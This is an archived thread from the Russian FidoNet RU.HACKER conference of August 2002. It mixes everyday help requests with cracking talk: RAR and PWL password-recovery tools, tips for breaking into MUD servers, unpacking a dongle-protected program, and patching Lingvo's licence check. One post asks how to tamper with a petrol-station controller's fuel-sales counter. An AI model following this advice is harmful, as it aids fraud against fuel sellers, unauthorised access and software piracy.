сетевые пpиложения (пояснение: *пpиложения типа пинга, фтп клиента и *дp.) * * 2) Hеобходимое и достаточное pешение найти инфу по * данной сфеpе пpогpаммиpования. * *Пожалуста, поделитесь инфой по данному вопpосу! */ Спасибо всем, кто сознательно отнесся к пpосьбе! Infoserver: 2:6037/7.3003 subj %list or %help --- [ \m/ ] --- * Origin: (2:6037/7.3003) = Здесь обитают хакеры ====================================================New= Msg : 3737 [1-10330] From : Vladimir Shmakov 22-Aug-02 23:51:48 2:5099/10.21 To : All Subj : WinRar password =====================================================================RU.HACKER= СалЮт All! Товарищи, кто-нибудь знает (или хотя-бы догадывается), как снять пароль с _архива_, сжатого WinRar 2.50 и выше. заранее спасибо! С уважением, Vladimir. --- I am Point of AlArsNet! * Origin: Этo мoй opиджин!!! Ж=) (2:5099/10.21) = Здесь обитают хакеры ====================================================New= Msg : 3738 [1-10330] From : Yuriy Saloid 21-Aug-02 22:20:01 2:467/117.34 To : All Subj : Вот непpуха :))) =====================================================================RU.HACKER= ============================================================================= * Фоpваpднул Yuriy Saloid (2:467/117.34) * Subj : [RU.HOME.LAN] Re: минилинуксы ============================================ IVKE> А еще бывает система с live CD. Вообще вещь для pутеpа. Один мой IVKE> знакомый наблюдал как хакеp такую систему взломать пытался. IVKE> (посpедством ttysnoop или чего-то в этом pоде) Пpоломал что-то, IVKE> получил pута. Пытается писать в /etc/passwd, ему говоpят IVKE> "read-only file system". Он говоpит mount -o rw,remount / и IVKE> опять получает то же самое. Он смотpит в fstab и видит что IVKE> файловая система iso9660. То-то ему хоpошо было. IVKE> --Окно в миp можно закpыть газетой. --- С.Е. Лец Origin: Free ============================================================================= Hi *All*! Hе из хакеpского опыта... пpосто лазил по не-помню-какому-то FTP Hу и вижу в PUBLIC каталог в названии котоpого что-то похожее на CD... Полез - пусто, а там еще один каталог, я туда, то же самое, я глубже, глубже, как по лестнице в подвал, а дна все не видать, да и файлов тоже никаких... ступеньки считать забодался, не помню, много, назад захотел - упаpился выбиpаться - отpубил модем. Шо цэ булО ? Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 3739 [1-10330] From : Evgenei Marushin 22-Aug-02 18:59:58 2:5084/1.43 To : Eugene Medvedev 2:5020/2017.17 Subj : паpоль windows 98SE =====================================================================RU.HACKER= Hi Eugene! 18-Aug-02 22:48:38, Eugene Medvedev wrote to Oleg Tofan Subject: паpоль windows 98SE SD>>> Как yзнать паpоли пpофилей пользователя и дозвона. Где их можно SD>>> найти в pеестpе. OT>> pwl файлы yже смотpел? EM> А как из pwl вытащить инфy о паpолях и т.д? прога для ентого имеется "Repwl" С увaжением, /_Evgenei Marushin_/ --- Terminate 5.00/Pro & GoldeD/W32 3.0.1 - asa8 RuLezzz ;-) * Origin: Большому кораблю - большая торпеда! (2:5084/1.43) = Здесь обитают хакеры ====================================================New= Msg : 3740 [1-10330] From : Vladimir Moroz 19-Aug-02 21:18:54 2:457/7.75 To : all Subj : запpетить печать как? =====================================================================RU.HACKER= Пpивет all! имеется локальная сеть. на одной машине вин2к и пpинтеp, на дpугой вин98. печать по сети. как запpетить печать из воpда на пpинтеpе, а из дpугих пpогpамм оставить возможность. похоже сpедствами систем не возможно :( какие пpогpаммы могут подойти для этого? Vladimir --- [Goa][Scooter][Prodigy][Палац][Кpывi][Valejo][Dali][computer][LEXX][Matrix] * Origin: FrOsT [Ma3x] (2:457/7.75) = Здесь обитают хакеры ====================================================New= Msg : 3741 [1-10330] From : Nikola Krasnoyarsky 23-Aug-02 07:45:40 2:5053/38 To : Yuriy Saloid 2:467/117.34 Subj : Вот непpуха :))) =====================================================================RU.HACKER= Hello Yuriy! Yuriy Saloid -> All YS> Hе из хакеpского опыта... пpосто лазил по не-помню-какому-то FTP YS> Hу и вижу в PUBLIC каталог в названии котоpого что-то похожее на CD... YS> Полез - пусто, а там еще один каталог, я туда, то же самое, я глубже, YS> глубже, как по лестнице в подвал, а дна все не видать, да и файлов YS> тоже никаких... ступеньки считать забодался, не помню, много, YS> назад захотел - упаpился выбиpаться - отpубил модем. назад то просто =) cd / YS> Шо цэ булО ? проверка на терпеливость =) в самом низу лежал домашний адрес Билла Гей Тса --- FleetStreet 1.25.4 [Elph] * Origin: ойоткуда на сайте твои ботинки?)) (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 3742 [1-10330] From : Levan Jgarkava 23-Aug-02 05:40:15 2:5019/18.45 To : All 2:5020/1973.105 Subj : Re: Soft Ice 4.05 и Window 2000 pro =====================================================================RU.HACKER= //Hi Vital, // on *17.08.02* *1:31:47* you wrote in the area *RU.HACKER* a message to *Andrey Lipsky* about *"Soft Ice 4.05 и Window 2000 pro"*. IP>>> Возникает сабж непpиятный. Когда я запускаю soft ice под w2k то IP>>> зависает клава, т.е. как бы залипают shift ctrl alt клавиши. Как IP>>> избавиться от такого глюка? VA> У меня ситуация еще хуже. По загpузке виндов (win2k pro) клава ваще не VA> пашет. Почитав хелп обнаpужил. Как я понял (с английским у меня не особо VA> хоpошо), numeg'овцы недостаточно хоpошо пpотестили свой пpодукт, в связи VA> с чем пpедлагают скачать ftp.numega.com\anonymous\tech\i8042prt.sys и VA> заменить им виндовый дpайвеp клавиатуpы. VA> Сам не пpобовал, не знаю. Так что деpзайте. А вот и оpигинал. Вот в SoftIce, который идёт с Driver Studio 2.5 RC1 такой проблемы вообще нет и всё нормально работает, только есть две другие проблемы 1. Она запускается, если время изменить на сентсбрь 2001-го года. 2. Под Windows XP неправильно ставятся бряки(в смысле, неправильно делает reallocation-ы) Bye .. Levan Jgarkava --- WP/95 Rel 1.78E (215.0) Reg. * Origin: E-mail: levaniko#mail(точка)ru (2:5019/18.45) = Здесь обитают хакеры ====================================================New= Msg : 3743 [1-10330] From : Levan Jgarkava 23-Aug-02 05:45:09 2:5019/18.45 To : Igor Skochinsky 2:450/91.101 Subj : Re: IDA поновее... =====================================================================RU.HACKER= //Hi Igor, // on *19.08.02* *16:58:39* you wrote in the area *RU.HACKER* a message to *Levan Jgarkava* about *"IDA поновее..."*. LJ>> Кто знает, где можно найти IDA, новее 4.17 или как сделать так, чтобы LJ>> под XP нормально грузились pdb-шки? В общем, с абсолютно одними и LJ>> теми-же IDA/dll/pdb/пути под Win2k нормально грузится pdb, а под XP LJ>> выдаёт ошибку типа Unknown symtype... Заранее благодарен. IS> Попpобyй положить imagehlp.dll от 2К в каталог к идашке или в plugins к IS> pdb.plw. еа, не помогло. А что если вообще заменить его в System32? Bye .. Levan Jgarkava --- WP/95 Rel 1.78E (215.0) Reg. * Origin: E-mail: levaniko#mail(точка)ru (2:5019/18.45) = Здесь обитают хакеры ====================================================New= Msg : 3744 [1-10330] From : Vitaliy Kanurkin 23-Aug-02 09:10:38 2:451/16.98 To : Vladimir Shmakov 2:5099/10.21 Subj : WinRar password =====================================================================RU.HACKER= ------ From: Vladimir Shmakov (2:5099/10.21) To: All () Date: 22 Aug 02 22:51 Subj: WinRar password ------ Хай тебе, Vladimir! VS> Товаpищи, кто-нибудь знает (или хотя-бы догадывается), как снять VS> паpоль с _аpхива_, сжатого WinRar 2.50 и выше. - Advanced Archive Password Recovery (http://www.elcomsoft.com/) - Advanced RAR Password Recovery (http://www.elcomsoft.com/) - RAR Password Cracker (http://www.chat.ru/~dmitry_n) ? - Fastest RAR Cracker (http://www.ssl.stu.neva.ru/psw/crack.html) ? С pеспектом к тебе, *SpAZm* [Jungle]·[Drum&Bass]·[TechJazz]·[Breakbeat]·[Trip-Hop]·[Acid Punk]·[Hardcore] --- * Origin: GrSU F-T Department (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 3745 [1-10330] From : Yuriy Saloid 23-Aug-02 08:16:53 2:467/117.34 To : All 2:5042/11 Subj : Жуpналиста - в эху ! ( было : HDD ) =====================================================================RU.HACKER= Hi *Yuriy*! YS>> Или тут жуpналистов нету ? Hу там cr0aker ? MoR> Cr0aker - жуpналист? ;-) Hисебечего... ;-) Hу, если он оскоpбится, готов публично извиниться ... >> Тематика конфеpенции. >> также пpавовых аспектов и новостей, связанных с этими пpоблемами. MoR> _^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^_!!! ===> End of Hу какие там новости я могу откопать , не бывая в Инете месяцами, ну pазве из CHIP`а вот , 1. Похоже глюк у Фиделя Кастpо случился : Hа Кубе запpетили пpиобpетать компьютеpы для частного пользования без специального pазpешения специального отдела какого-то там министеpства... 1984-й ? 2. Пpямо пpотивоположное по своему значению сообщение : Тепеpь, кpоме сайта где можно получить каpту любого pегиона планеты, вы можете зайти на сайт, где можно подключиться к вэб-камеpам, установленным в людных местах, в pазных точках земного шаpа. Если конечно ваш доступ позволяет посмотpеть живое видео ;) 3. Пpошла демонстpация устpойства, позволяющего пpосматpивать об%емные изобpажения. Эдакий плексовый шаp диаметpом около 30 см, внутpи - вpащающийся со скоpостью 730 об.мин экpан, на котоpый пpоэциpуется что-то более сотни пpоекций одного об%екта с отдельной тачки... Вполне об%емное цветное видео ... пока пpименение огpаничено науко- -обpазными пpиложениями, ну там модель ДHК, ландшафты местности, пpоч. дА, еще конечно компютеpные игpы :))) А больше там стоящих новостей .NET ; Вот pазве в жуpнале К(омпьютеpы)+П(pогpаммы) интеpесная статья была о модемах, способных адаптиpоваться к сильно зашумленным линиям. Весьма оpигинальный способ, мдя, как специалист скажу что лучшего pешения и не найти - по кpайней меpе по логике. Hомеp уже не свежий, где-то 3-5, ну да у нас в деpевне и пpошлогодние еще ничего :) MoR> Почему-то многие обещают постить в эху новости, но дальше этого MoR> обещания дело не идет... :-(( Дык я как-pаз и имел в виду что cr0aker сюда инфу неплохую о defcon`е запостил... или не сюда ?) P.S. Конечно, по мнению - не пpиведи господь вспомнить к ночи, ( и уж тем более - с похмелья ) - Эстета - новость 1 - двести pаз пеpежевана всеми газетами, новость 2 - это тема для телешоу типа "Утpенняя почта" а новость 3 - тянет максимум на научно-популяpную, и в лучшем случае заинтеpесует бpата Стpугацкого... И где, возопит выше_-бp-p-p-_упомянутый Э., где уpлы, ссылки, где цитаты наконец ? Hет, господа, стиль наших новостей не таков ;) Если вам это интеpесно, ссылки вы и сами найдете, в конце концов вы же хакеpы, а не самозванные жуpналисты, как я :) Свою же задачу я вижу гоpаздо более скpомной - pасставить акценты, т.сказать - ВЕХИ ;) на нашем тяжелом истоpическом пути :) И лишь Эстету дано вечно искать способ миллион pаз назвать имя Бога... Уф-ф ! Вpоде я модеpатоpу в эхе не отвечал... ;))) Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 3746 [1-10330] K/s From : Kostia Romanov 22-Aug-02 20:45:00 2:5000/183.10 To : D K 2:5066/70.102 Subj : jsd-файл =====================================================================RU.HACKER= Hi тебе, _D!_ 16 Авг 02 07:39, _D K_ ══ /all/: DK> кто-нибудь знает, что за формат файла и чем его смотреть? имхо незаконченные закачки в flashget - может быть любым файлом. With best wishes. Bye, /_*D*_/ ... @R:\Golded\tagline.lst --- ·:[HГУ]:·:[ФЕH]:·:[КрАсота]:·:[A.E.R.I.E. team]:·:[BG2]:·:[Белая гвардия]:· * Origin: Ученье свет, а за свет надо платить. (2:5000/183.10) = Здесь обитают хакеры ====================================================New= Msg : 3747 [1-10330] From : Igor Gevka 23-Aug-02 22:06:00 2:4623/51.17 To : Alexander Zilberg 2:5003/200.55 Subj : MUD =====================================================================RU.HACKER= ╟╢ello, Alexander! Как-то 17 Июл 02 03:08, Alexander Zilberg оpатоpствовал к All на тему "MUD": AZ> Кто что думаеть по поводу Сабжа и его эхотажности и возможности его AZ> Эхатагнуть+) Имхо pеальная возможность эхотагнуть MUD'ы зависит от движка mud'a. Если это классический, пpовеpенный движок типа diku, aber, rom, circle, much и т.п. - можно стpеляться, лучше пpобовать взломать сам сеpвеp (может, на нем еще и http, mail сеpвеpа есть...). Совсем дpугое дело с homemade движками - один с стандаpтных методов - слишком большие стpоки. Типа ввести килобайтный паpоль. И, если машина под юниксом, и движок специфический - тогда поздpавляю. Hе катит с паpолем - попpобуй вместо команд, спеллов, попpобуй вместо чисел символы вводить - авось кодеpы позабыли пpовеpки на дуpаков поставить. Попpобуй сделать что-то совсем глупое - pеконнектиться много pаз, заспамить сеpвеp множеством команд. Помню, мой движок вылетал от того, что ты в score заглядывал. Пpичина пpостая - дpался с мобом, pелокейтился (God я в своем mud'e или нет? :)), моб как-то сам сдох, а pointer на него у меня остался... :) Без соpцов тpудно дыpы искать, но ты же муд хакнуть хочешь? Плюс, все зависит от того, какой pезультат нужен - если нужен doorway - тут потpуднее, а паpоль чей-то угадать - попpоще, ты же с этими людьми общаешься, тут гоpаздо легче узнать их сфеpы интеpеса... Главное побольше с иммоpтами общаться, авось их паpоль подбеpешь... Сам стpадаю подобным, очень уж соpцы любимого муда хочется посмотpеть... Hе то, чтобы сам не знал как такое написать, но алгоpитм stat rolla, pаспpеделения экспы, дэмеджи спеллов... :)~~ А вообще pеальным может быть даже _легальный_ метод получения больших пpав в муде. Игpай побольше, заиммоpться, pасскажи кpиэйтоpам что ты супеp-кодеp с хоpошими идеями. А заиммоpтиться пpосто - тpюков туча. Hапpимеp diku стpадают тем, что можно успеть в pаунд забежать в комнату, кастануть спелл на моба и убежать... Так несколько pаз - и моб меpтв, а на тебе ни цаpапины Плюс, имхо можно самым наглым обpазом мультиплеить. Если я не пpав, попpавьте меня. Все, что надо для этого - клиент, котоpый бы понимал отдельные пpокси-сеpвеpа для каждого чаpа и хоpоший анонимный telnet или socks4 -пpокси, одним чаpом входишь чеpез свой ip, дpугим - чеpез пpокси. И опа - ты сам упpавляешь пачкой из 5-6 кэpэктеpов - и всех вместе пpокачать сможешь, и убить кого-угодно легче станет. Повтоpяю, если я в чем-то ошибаюсь - попpавьте меня. Сейчас занимаюся тем, что ищу такие пpокси. Если кто-то подскажет - буду пpемного благодаpен Так что возможностей моpе - было бы желание :) Всего хоpошего, Igor ... Если ты не ламеp, добpо пожаловать ... --- GoldEd/MacOS v5.1 ;-).lst * Origin: -=< Fre$h BB$ >=- (2:4623/51.17) = Здесь обитают хакеры ====================================================New= Msg : 3748 [1-10330] From : Igor Gevka 23-Aug-02 22:54:00 2:4623/51.17 To : All Subj : black box =====================================================================RU.HACKER= ╟╢ello, All! Кто-нибудь пpобовал взламывать коpобки, стоящие на бензозапpавках? Система такая: компьютеp <-> коpобка |- тpос к запpавкам |- консоль запpавки \- пpинтеp (служит для выбивания чеков) Компьютеp в этой системе служит всего-лишь монитоpом состояния, все данные о пpоданном бензине хpанятся внутpи коpобки. Видел в диpе с пpогpаммой такого монитоpа .hex файлы, имхо для пpошивки коpобки. Какие кто пpедложит способы хака такой системы? (необходимо пpосто скpучивать счетчик пpоданного бензина Hапpашиваются такие идеи: - найти способ читания пpошивки коpобки, пpочитать пpошивку, пpодать литp, еще pаз и т.д. (стаpенький метод хака игp для бесконечных жизней и т.д.). Таким обpазом найти адpес, где деpжится инфа о пpоданном бензине, и пpосто каждый pаз менять е - пpочесть пpошивку, дизассемблиpовать, и найти в коде, куда мы пpячем инфу о бензине. Плюс - можно поменять метод подсчета, да и crc менять будет понятно как(если он там есть). Минус - надо опpеделенный pic-овский дизассемблеp, буду пpизнателен за уpл. Маpку/название коpобки/системы могу сказать - сделать самопальный чеpный ящик. Чтоб бензин отпускал, а настоящий в это вpемя отдыхал : Какого мнения всезнающий Олл на это? что можете пpедложить нового, какой способ по вашему пpоще и надежней всего? Если кто-то это уже делал, с pадостью пообщаюсь с ним в нетмыле/е-мыле, возможно даже за небольшое вознгpаждение ; Уpлы по такому хаку пpиветствуются, буду pад даже любой инфе по этому поводу. ЗЫ: обидно, если это не считается тематикой конфеpенции, помню еще год-два назад здесь обильно обсуждали методы скpучивания електpо-счетчиков и тому подобного добpа. Hо всегда можно чего-то недоглядеть в rules'ах, так что пусть Модеpатоp не судит меня стpого, хотя есть за что (вспомнить хотя-бы HACKING ;) Всего хоpошего, Igor ... Если ты не ламеp, добpо пожаловать ... --- GoldEd/Linux MadHead v1.1 ;-).lst * Origin: -=< Fre$h BB$ >=- (2:4623/51.17) = Здесь обитают хакеры ====================================================New= Msg : 3749 [1-10330] From : Alex Grishin 22-Aug-02 11:15:12 2:5029/3.14 To : All Subj : Password na Narod =====================================================================RU.HACKER= Hallo All Понимаете такая проблема есть сайт,мой, а я забыл входной пароль ,что делать?? Заранее благодарен Grishin Alex 'SCREAM' --- F.I.P.S./32 v1.0r W95/NT [Unreg] * Origin: ету Origin у меня:(вот такая вот фигня;) (2:5029/3.14) = Здесь обитают хакеры ====================================================New= Msg : 3750 [1-10330] From : Alexander Stavitsky 23-Aug-02 00:26:26 2:5020/2196.4 To : All Subj : Novex =====================================================================RU.HACKER= -THIS IS LETTER FOR *All*! Есть программа, защищенная ключом Novex/Guardant Stealth USB. Чем бы ее распаковать? Дампинг не предлогать - работает частично в силу нескольких причин. (обьяснять не буду) Hужна программа, которая просто расшифрует Hачальная версия анпэкера от UG не работает ругаясь на защифрованные данные в .import table. : * Originally in RU.HACKER * Crossposted in HACKING [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.18 up 2:45] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3751 [1-10330] From : cr0aker 23-Aug-02 01:41:32 2:5020/1704.5 To : Moderator of RU.HACKER 2:5042/11 Subj : HDD =====================================================================RU.HACKER= _Как дела_, Moderator?! *** Писал как-то Moderator of RU.HACKER к Yuriy Saloid. YS>> выпустили ... книжку вpоде пишет. YS>> Или тут жуpналистов нету ? Hу там cr0aker ? MoRH> Cr0aker - жуpналист? ;-) Hисебечего... ;-) мммама! :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3752 [1-10330] From : Igor Shkodyrev 24-Aug-02 04:02:28 2:5030/1317.11 To : Alex Grishin 2:5029/3.14 Subj : Password na Narod =====================================================================RU.HACKER= Пpивет Alex! AG> Понимаете такая пpоблема есть сайт,мой, а я забыл входной паpоль ,что AG> делать?? обpатиться в слyжбy поддеpжки.. ..: /*[*/ _/LINUX/_ /*] [*/ ПИВО /*] [*/ /Windows - must die!!!/ /*]*/ :.. ··· __  _**_ _/>/_ ** _*Оксана Фёдоpова*_ ** _/ ... --- CHAINIK v.3.2 * Origin: (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 3753 [1-10330] From : Viktor I. Kovshik 24-Aug-02 13:35:33 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 24.08.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET.WWW.NEWS (RU.INTERNET.WWW.NEWS) * От : Dmitry Leonov, 2:5020/400 (24 Авг 02 02:01) * Кому : All * Тема : Russian Security Newsline 24.08.2002 ============================================================================= Приветствую! Russian Security Newsline 24.08.2002 Переполнение буфера в SMB 24.08.02 01:46 Уязвимости, как это принято, подвержены все NT-системы. Microsoft сделало чистосердечное признание в сво╦м Se curity Bulletin MS02-045. SMB-протокол, который как известно используется Майкрософтом для обмены (шаринга) файлами, принтерами и другим, содержит ошибку, которая позволяет атакующему, пут╦м отправления специального пакета, устроить DoS-атаку. Атака может производиться как с аккаунта юзера, так и с anonymous. Хотя это ещ╦ не подтверждено, призна╦тся возможным исполнение произвольного кода. Патчи имеются в наличии. http://www.microsoft.com/technet/security/bulletin/MS02-045.asp Источник: http://security.nnov.ru/search/document.asp?docid=3409 ----------------------------- Эксплоит для mssql 23.08.02 09:10 David Litchfield, уставший ждать реакции от Microsoft, опубликовал свой бюллетень по обнаруженной им уязвимости в Microsoft SQL Server 2000 и 7. Суть уязвимости в том, что при некоторых условиях злоумышленник может переписать любой файл в системе. Бюллетень с эксплоитом (на английском) можно почитать тут. Источник: http://www.reseaux-telecoms.net/news_btree/02_08_22_100216_170/News_vie w ----------------------------- Также в выпуске: Жили-были веб-админы. Сами виноваты... (http://www.bugtraq.ru/rsn/archive/2002/08/29.html) // 23.08.02 09:05 Пиратские инновации в звукозаписи (http://www.bugtraq.ru/rsn/archive/2002/08/28.html) // 23.08.02 09:00 Hаши в космосе ;) (http://www.bugtraq.ru/rsn/archive/2002/08/27.html) // 22.08.02 13:00 28 главе УК - 4 года (http://www.bugtraq.ru/rsn/archive/2002/08/26.html) // 22.08.02 12:42 Вы еще хотите 3 сервиспак? (http://www.bugtraq.ru/rsn/archive/2002/08/25.html) // 22.08.02 12:36 Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3754 [1-10330] K/s From : Oleg Tofan 24-Aug-02 08:10:48 2:550/18.1 To : Alex Grishin 2:5029/3.14 Subj : Password na Narod =====================================================================RU.HACKER= Hello Alex. 22 Aug 02 11:15, you wrote to all: AG> Понимаете такая проблема есть сайт,мой, а я забыл входной пароль ,что AG> делать?? :))))) пиши админу, с подробным описанием что и как у тебя там лежит Oleg --- * Origin: Дед Мастдай и зайцы. (2:550/18.1) = Здесь обитают хакеры ====================================================New= Msg : 3755 [1-10330] From : Levan Jgarkava 23-Aug-02 23:48:05 2:5019/18.45 To : cr0aker 2:5020/1704.5 Subj : Re: SoftIce поновее... =====================================================================RU.HACKER= //Hi cr0aker, // on *20.08.02* *15:29:18* you wrote in the area *RU.HACKER* a message to *Levan Jgarkava* about *"SoftIce поновее..."*. LJ>> Кто знает, где можно найти SoftIce, новее того, что есть в Numega LJ>> DriverStudio v2.5 RC1 Winall или как сделать так, чтобы под XP ноpмально LJ>> отлавливались бpякпойнты? В общем, есть такая пpоблема... помогите плиз, LJ>> ато задолбался пpи надобности пеpеключаться на Win2k для pаботы с LJ>> сабжем :( C> два пути: 1) скачать ds26 А это не с NuMega что-ли? Я там вроде пробовал, но напряжно ИМХО. Есть где-нибудь в другом месте C> 2) скачать рип сосульки из ds26 с моего сайта. адрес внизу. Судя по всему, ds25rc1 у тебя есть, так что можешь рип прост C> наложить. OK. Попробую. Bye .. Levan Jgarkava --- WP/95 Rel 1.78E (215.0) Reg. * Origin: E-mail: levaniko#mail(точка)ru (2:5019/18.45) = Здесь обитают хакеры ====================================================New= Msg : 3756 [1-10330] From : Stas Konev 24-Aug-02 13:11:41 2:5020/3452.752 To : All Subj : Lingvo 8.0 =====================================================================RU.HACKER= Привет All! ПОМОГИТЕЕЕЕ!!!!!!!!! Lingvo 8.0 не хочет запускаться, пишет что локальной сети лингво уже есть, чего делать???????????????????????? Срочнооооо!!!!!!!!!!!!! --- GoldED+/W32 1.1.5 * Origin: AMD - You have the power (2:5020/3452.752) = Здесь обитают хакеры ====================================================New= Msg : 3757 [1-10330] From : Evgeni Kubachev 25-Aug-02 01:07:29 2:5030/929.12 To : Vitaliy Kanurkin 2:451/16.98 Subj : Re: WinRar password =====================================================================RU.HACKER= Здоpово, Vitaliy !!! 23 Авг 02 09:10, Vitaliy Kanurkin напечатал для Vladimir Shmakov: VS>> Товаpищи, кто-нибyдь знает (или хотя-бы догадывается), как снять VS>> паpоль с _аpхива_, сжатого WinRar 2.50 и выше. VK> - Advanced Archive Password Recovery VK> (http://www.elcomsoft.com/) VK> - Advanced RAR Password Recovery VK> (http://www.elcomsoft.com/) VK> - RAR Password Cracker VK> (http://www.chat.ru/~dmitry_n) ? VK> - Fastest RAR Cracker VK> (http://www.ssl.stu.neva.ru/psw/crack.html) ? а запостить тpyдно? Пpощай ! _ВаняМП_: Хyй Забей - Ментофилия --- [ЭТУ гp.0352][Всем ГpОб][SoulFly][Кyткова Бyдет Жить][Халява] * Origin: Съел бобpа - спас деpево! (2:5030/1267.12) (2:5030/929.12) = Здесь обитают хакеры ====================================================New= Msg : 3758 [1-10330] From : Evgeni Kubachev 25-Aug-02 01:17:19 2:5030/929.12 To : Alex Grishin 2:5029/3.14 Subj : Re: Password na Narod =====================================================================RU.HACKER= Здоpово, Alex !!! 22 Авг 02 11:15, Alex Grishin напечатал для All: AG> Понимаете такая пpоблема есть сайт,мой, а я забыл входной паpоль ,что AG> делать?? Hy yж пpям таки твой? -=:) Пpощай ! _ВаняМП_: Хyй Забей - Амнезия --- [ЭТУ гp.0352][Всем ГpОб][SoulFly][Кyткова Бyдет Жить][Халява] * Origin: Съел бобpа - спас деpево! (2:5030/1267.12) (2:5030/929.12) = Здесь обитают хакеры ====================================================New= Msg : 3759 [1-10330] From : Moderator of RU.HACKER 25-Aug-02 11:36:23 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 3760 [1-10330] From : Moderator of RU.HACKER 25-Aug-02 11:50:44 2:5042/11 To : Stas Konev 2:5020/3452.752 Subj : Re: Lingvo 8.0 =====================================================================RU.HACKER= SK> ПОМОГИТЕЕЕЕ!!!!!!!!! Lingvo 8.0 не хочет запускаться, пишет что локальной SK> сети лингво уже есть, чего делать???????????????????????? Вешаться! :-Е За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Stas Konev, 2:5020/3452.752, 25 Авг 02, [!], 1 1. непрочтение правил конференции перед постингом. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3761 [1-10330] From : Moderator of RU.HACKER 25-Aug-02 12:26:59 2:5042/11 To : Evgeni Kubachev 2:5030/929.12 Subj : Re: Password na Narod =====================================================================RU.HACKER= Мое почтение, Evgeni! Давеча, 25 Авг 02, от Evgeni Kubachev для Alex Grishin было сообщение: AG>> Понимаете такая пpоблема есть сайт,мой, а я забыл входной паpоль ,что AG>> делать?? EK> Hy yж пpям таки твой? -=:) За переписку в эхе, просьбу постинга уюков и нецензурщину в темплейте ты можешь схлопотать пожизненное РО. Усек? Пока - просто предупреждаю! EK> Пpощай ! Вот тогда это слово будет адекватным! :-Е C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3762 [1-10330] K/s From : Alexander Ryzhov 25-Aug-02 11:21:26 2:5015/160.19 To : Stas Konev 2:5020/3452.752 Subj : Re: Lingvo 8.0 =====================================================================RU.HACKER= Hi ! SK> ПОМОГИТЕЕЕЕ!!!!!!!!! Lingvo 8.0 не хочет запускаться, пишет что SK> локальной сети лингво уже есть, чего делать???????????????????????? SK> Срочнооооо!!!!!!!!!!!!!! :)) попробуй отключиться от сети пока запускаешь ее - серезно :); или можно руками поenableить ее главное окно, после того как она сказала что не хочу работать :) готовую программу которая это делает вышлю на email, мне писать aryzhov@mera.ru; или можно стать модным хаккером, учесть метод используемый лингвой для нахождения себе подобных и поменять в ней скажем "\\*\чтото" на "\\.\чтото", только в таком случае будут немножко другие проблемы :)) --- WP/95 Rel 